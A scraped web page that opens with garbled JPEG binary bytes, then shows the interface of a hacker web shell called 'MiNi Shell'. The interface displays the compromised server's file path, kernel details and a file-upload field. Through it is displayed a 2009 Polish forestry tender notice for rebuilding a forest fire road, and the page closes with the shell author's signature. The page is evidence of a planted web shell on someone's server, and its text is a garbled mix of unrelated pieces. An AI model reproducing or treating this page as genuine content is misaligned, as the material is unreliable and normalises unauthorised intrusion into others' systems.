JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090402/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090402/88954-N-2009.html

<p class="kh_header"><b>Krzyż Wielkopolski: Przebudowa II odcinka drogi leśnej pożarowej Nr 16 na terenie leśnictwa Wizany  .</b><br>
<b>Numer ogłoszenia: 88954 - 2009; data zamieszczenia: 02.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Lasy Państwowe Nadleśnictwo Krzyż , Łokacz Mały ul. Adama Mickiewicza 1, 64-761 Krzyż Wielkopolski, woj. wielkopolskie, tel. 067 2564009, 2564097, faks 067 2564561.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pila.lasy.gov.pl/krzyz</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: leśnictwo.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa II odcinka drogi leśnej pożarowej Nr 16 na terenie leśnictwa Wizany  ..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przebudowa odcinka drogi leśnej pożarowej, gruntowej ,dojazdowej do obszarów leśnych leśnictwa Wizany i Zwierzyniec wraz z remontem przepustu drogowego . Droga w stanie istniejącym jest drogą gruntową, naturalną . Całkowita długość drogi wynosi 7 242  m. przebiegająca przez oddziały :320,290289,290/262,263,223,199,173/172,146/145,124/123,99. II etap przebudowy obejmuje odcinek od km.2+552 do 3+515 km. 
Kolejny nowy odcinek  drogi o długości 963 m. wykonany  o nawierzchni :
w-wa górna z kruszywa naturalnego stabilizowanego mechanicznie - 10 cm.
w-wa dolna z kruszywa łamanego stabilizowanego mechanicznie o uziarnieniu ciągłym
grubość warstwy 20 cm./ wykonana dwuwarstwowo 12+8 cm./
warstwa wzmacniająca -geowłóknina  
Droga przebiega po istniejącej drodze gruntowej ograniczonej drzewostanem.
Szczegółowy opis zakresu prac oraz technologia wykonania robót, a także zakres określone zostały w załączonych do SIWZ  przedmiarze robót. Przebieg dróg wskazuje załączona mapka z zaznaczoną trasą..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 45.23.31.23-7, 45.23.31.40-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.07.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wysokość wadium na całość zamówienia ustala się w kwocie 5 000,00 złotych
słownie : pięć tysięcy złotych.
Miejsce wnoszenia wadium :
lub na wskazany rachunek bankowy :
 - Bank : PKO BP S.A o/Krzyż Wlkp.
 - Nr rachunku : 17 1020 3844 0000 1702 0076 7533
Uwaga
Wadium wnoszone w pieniądzu należy wpłacać przelewem na wskazane konto, wnoszone w papierach wartościowych, oryginały papierów (gwarancje, poręczenia ) należy zdeponować w kasie. Kopie załączyć do oferty.
Zamawiający uzna za wadium wniesione przelewem w pieniądzu, jeżeli należna kwota została zaliczona na rachunku Zamawiającego najpóźniej w dniu składania ofert przed godziną składania ofert.

Wadium zostanie zwrócone jeżeli :
     upłynął termin związania ofertą, z wybranym Wykonawcą zawarto umowę,
     unieważniono postępowanie, a protesty zostały ostatecznie rozstrzygnięte lub   
     upłynął termin do ich wnoszenia,
     wykonawca złożył wniosek o zwrot wadium po wycofaniu oferty przed upływem 
     terminu składania ofert,
     wykonawca został wykluczony z postępowania,
     oferta wykonawcy została odrzucona.
Wadium wykonawca utraci jeżeli :
     odmówi podpisania umowy na warunkach określonych w ofercie,
     nie wniósł zabezpieczenia należytego wykonania umowy,
     zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie 
     wykonawcy.

 Wadium można wnosić w następujących formach :
- zgodnie z art. 45ust.6 ustawy PZP.

 Termin wnoszenia wadium : do dnia 28 kwietnia  2009 r. do godziny 9.00
 Wadium wniesione w pieniądzu, Zamawiający przechowa na rachunku bankowym i zwrócić je wraz z odsetkami wynikającymi z umowy rachunku bankowego, pomniejszone o koszty postępowania bankowego.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą brać udział wykonawcy, którzy :      
1 są uprawnieni do występowania w obrocie prawnym zgodnie z wymaganiami ustawowymi,  
2 przedsiębiorcy składające ofertę wspólną przedstawią do oferty umowę o solidarnej odpowiedzialności oraz o wyznaczeniu spośród siebie strony wiodącej tj. Lidera, który będzie reprezentował zawiązane konsorcjum przed Zamawiającym,
Jeżeli wykonawca zamierza powierzyć część zadania podwykonawcom, to będzie miał obowiązek :
1. zawrzeć umowę przedwstępną z podwykonawcą zawierającą m.in. :
   nazwę i adres osoby, której dana część zostanie powierzona,
   wykaz powierzonych części robót,
   sposób rozliczenia z  podwykonawcą za wykonane roboty rozliczenie z 
   podwykonawcą nie może nastąpić później niż w ciągu 5 dni od otrzymania  
   zapłaty wykonawcy od Zamawiającego - brak rozliczenia z podwykonawcą  
   wstrzyma dalszą zapłatę należnego wynagrodzenia wykonawcy ,
   zobowiązanie podwykonawcy o nie dokonywaniu dalszego podzlecania 
   powierzonej części robót,
2. przedstawić uprawnienia lub kwalifikacje podwykonawcy do wykonania części 
    zadania powierzonego, jeżeli takie są wymagane,
3 posiadają niezbędne uprawnienia lub kwalifikacje do wykonywania zamówienia,
w tym względzie :
1. Kierownik budowy - uprawnienia w specjalności drogowej i doświadczenie w kierowaniu robotami o zakresie objętym zamówieniem odpowiadające wymaganiom określonym w art.12 ust.7 ustawy z dnia 7 lipca 1994r Prawo budowlane Dz.U.Nr 89 poz.414 z późn. zm. , wpisany na listę Okręgowej Izby Architektów lub Okręgowej Izby Inżynierów Budownictwa Dz. U. Nr 5 z 2001r poz. 42 z późn. zm. oraz do rejestru prowadzonego przez Głównego Inspektora Nadzoru Budowlanego - dotyczy uprawnień wydanych po 14.02.1995r.
2. Kierownik budowy, w terminie 3 - 5 dni przed rozpoczęciem robót przedstawi inspektorowi nadzoru plan realizacji robót wraz z opisem sposobu zabezpieczenia jakości ich wykonania. 
3.  dysponują niezbędną wiedzą, doświadczeniem, potencjałem ekonomicznym i technicznym gwarantując wykonanie zamówienia,
w tym względzie :
1. wykażą i udokumentują wykonanie  referencje, opinie, listy polecające  w okresie ostatnich 3 lat conajmniej jednej roboty drogowej odpowiadającej swoim rodzajem  o nawierzchni z kruszywa naturalnego lub łamanego  i przynajmniej połowie wartości ceny ofertowej,
2. dysponują pracownikami posiadającymi odpowiednie kwalifikacje do wykonania robót,
3. dysponują sprzętem niezbędnym do realizacji zamówienia tj. spycharka, równiarka, walec do utwardzania nawierzchni tłuczniowej i żwirowej, środki transportu do przewozu materiałów sypkich  samochody wywrotki ,
4. posiadają lub mają dostęp do materiału nadającego się do wbudowania w drogę.
   Inwestor nie dopuszcza wbudowania gruzu budowlanego.
5 posiadają sytuację finansową gwarantującą wykonanie robót w ustalonym terminie,
w tym względzie :
1. posiadają własne lub udokumentują dostęp  informacja z banku o stanie posiadanych środków lub dostępności kredytu wraz z podaniem kwoty kredytu wystawiona w okresie trwania postępowania  do środków finansowych zapewniających ciągłość robót przez cały okres ich trwania, 
2. kwota posiadanych lub dostępnych środków nie może być mniejsza niż 40 % ceny ofertowej,
3. środki na zabezpieczenie finansowania inwestycji muszą być wolne od zobowiązań z  tytułu innych realizowanych zamówień,
4. wyrażą zgodę na warunki zapłaty określone w rozdziale III pkt. 2.
  6) po zakończeniu robót uporządkują teren,  sporządzą dokumentację powykonawczą,
dokumentacja powykonawcza ma zawierać :
- wykaz ilość robót wykonanych,
- zmiany projektowe wynikłe w toku wykonywania robót naniesione w dokumentacji projektowej,
7 nie podlegają wykluczeniu w rozumieniu art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych,
 8 udzielą rękojmi za wady wykonanych robót na okres 36 miesięcy licząc od zakończenia i oddania drogi do używania,
  9 niezależnie od udzielonej rękojmi za wady wykonanych robót, udzielą gwarancji jakości na okres 36 miesięcy licząc od zakończenia i oddania drogi do używania,
10  zamówienie  wykonają w terminie, jak określono w rozdz. IV,
11 złożą do oferty dokumenty czytelne, bez przeróbek i skreśleń,
Zamawiający oceni spełnienie warunków wymienionych w niniejszym rozdziale na podstawie złożonych do oferty przez Wykonawcę oświadczeń i dokumentów.
Oceny spełniania warunków dokona komisja przetargowa powołana do oceny ofert.
Ocena spełniania warunków będzie dokonywana na zasadzie : spełnia  nie spełnia.
Wykonawca, który nie udokumentuje spełnianie wymienionych wymagań, zostanie wykluczony z postępowania, a jego oferta odrzucona..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Na potwierdzenie spełnienia warunków , Zamawiający wymaga złożenia, do oferty następujących oświadczeń i dokumentów :
- celowym jest aby dokumenty oferty ułożyć wg kolejności -
1. Wypełniony  załącznik nr 1 - formularz  OFERTA   
 2. Aktualny odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji działalności gospodarczej uprawniające do występowania w obrocie prawnym - zgodnie z art. 27 - 31 ustawy z dnia 19 listopada 1999r Prawo działalności gospodarczej.
Dodatkowo :
 1 - spółki cywilne i spółki jawne - umowa spółki,
 2 - spółki z ograniczona odpowiedzialnością - uchwała wspólników - dotycząca zadania objętego zamówieniem - uprawniająca zaciąganie zobowiązania do świadczenia o wartości dwukrotnie przewyższającej wysokość kapitału zakładowego lub umowa spółki, kiedy złożenie takiej uchwały jest zbędne  art. 230 Ksh 
 3 - umowa regulująca współpracę podmiotów występujących wspólnie  np. konsorcja - umowa o konsorcjum na zadanie objęte zamówieniem ) zawierająca :
- zapis o solidarnej odpowiedzialności, 
- czas trwania umowy,
- podmiot wiodący - lidera,
- nazwę Zamawiającego,
- przedmiot zamówienia
3. Oświadczenia o :
- sposobie realizacji zamówienia tj. wyłącznie siłami własnymi lub przy użyciu podwykonawców,
- okresie odpowiedzialności z tytułu rękojmi za wady wykonanych robót,
- okresie gwarancji jakości na wykonane roboty,
- uporządkowaniu terenu po zakończeniu robót,
- sporządzeniu dokumentacji powykonawczej,
- terminie wykonania zamówienia,
- zaakceptowaniu warunków zapłaty określonych w rozdziale III pkt. 2,
- przedstawieniu inspektorowi nadzoru w terminie 3 - 7 dni przed rozpoczęciem robót planu realizacji robót wraz z opisem sposobu zabezpieczenia jakości ich wykonania. 
- dokonaniu wizji lokalnej na terenie robót objętych zamówieniem  tu należy podać datę odbytej wizji lokalnej 
Uwaga
Ww. oświadczenia należy złożyć na jednej kartce w kolejności, jak przedstawia pkt.3
 
 4. Informacja Banku prowadzącego rachunek podstawowy wykonawcy zawierająca dane o stanie środków własnych lub dostępności kredytu - z podaniem wysokości kwoty kredytu  tj. zdolności kredytowej wykonawcy  wskazująca na możliwość wykonania zadania . Informacja musi być wydana w okresie 6 miesięcy przed upływem terminu składania ofert.
 5. Zaświadczenia o nie zaleganiu, zwolnieniu, odroczeniu  lub rozłożeniu na raty zaległych płatności  płatności należnych podatków, opłat lub składek na ubezpieczenie społeczne wystawione przez właściwy terenowo oddział Urzędu Skarbowego i Zakładu Ubezpieczeń Społecznych - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
6. Opinie inwestorów, użytkowników obiektów, które wymieniono w wykazie - zał. Nr 4.
     7. Wypełnione następujące załączniki:
  nr 2 - oświadczenie w trybie art. 24 uPzp
  nr 3 - oświadczenie w trybie art.22 ust.1 uPzp,
  nr 4 - wykaz sprzętu planowanego do wykonania zamówienia
  nr 5 - wykaz zrealizowanych podobnych robót,
    nr 6 - informacja o stanie zatrudnienia,
8. Wykaz podwykonawców i powierzonej im części zamówienia.
Do oferty należy załączyć :
1. umowę przedwstępną z podwykonawcą zawierającą m.in. :
a zakres powierzonej do wykonania części zamówienia,
b sposób rozliczenia za wykonane roboty ( wg projektu umowy, który stanowi załącznik do niniejszej SIWZ ,
2. uprawnienia do wykonania części zadania powierzonego, jeżeli takie są wymagane,
  9. Umowy o dzierżawę, najem lub leasing sprzętu niezbędnego do wykonywania zamówienia, a którego składający ofertę nie jest właścicielem.
10. Kosztorysy ofertowe opracowane na podstawie załączonych przedmiarów robót .
11. Kopia dowodu wniesienia wadium.
13. Wykaz kadry kierowniczej wraz z niezbędnymi uprawnieniami lub kwalifikacjami oraz dla kadry kierowniczej sprawującej samodzielne funkcje w budownictwie kopie wpisu na OLIB i do rejestru GINB.
14.  Każda z firm wspólnie składających ofertę złoży następujące dokumenty :
   1 zaświadczenie uprawniające do występowania w obrocie prawnym,
   2 załączniki Nr : 2, 3, 4, 5, 6,
   3 zaświadczenia o nie zaleganiu z uiszczeniem podatków, opłat i składek na ubezpieczenie społeczne  US, ZUS ,
 4) polisa ubezpieczeniowa wykonawcy potwierdzająca ubezpieczenie od OC w zakresie prowadzonej działalności gospodarczej.
    Ważność ww. dokumentów - jw. 
Kopie dokumentów muszą być potwierdzone za zgodność z oryginałem 
przez Wykonawcę.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.pila.lasy.gov.pl/krzyz.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Biuro nr 1 /sekretariat Nadleśnictwa Krzyż
ul.Adama Mickiewicza 1 
w Łokaczu Małym
64-761 Krzyż Wielkopolski.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.04.2009 godzina 10:00, miejsce: Biuro nr 1 /sekretariat Nadleśnictwa Krzyż
ul.Adama Mickiewicza 1 
w Łokaczu Małym
64-761 Krzyż Wielkopolski.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com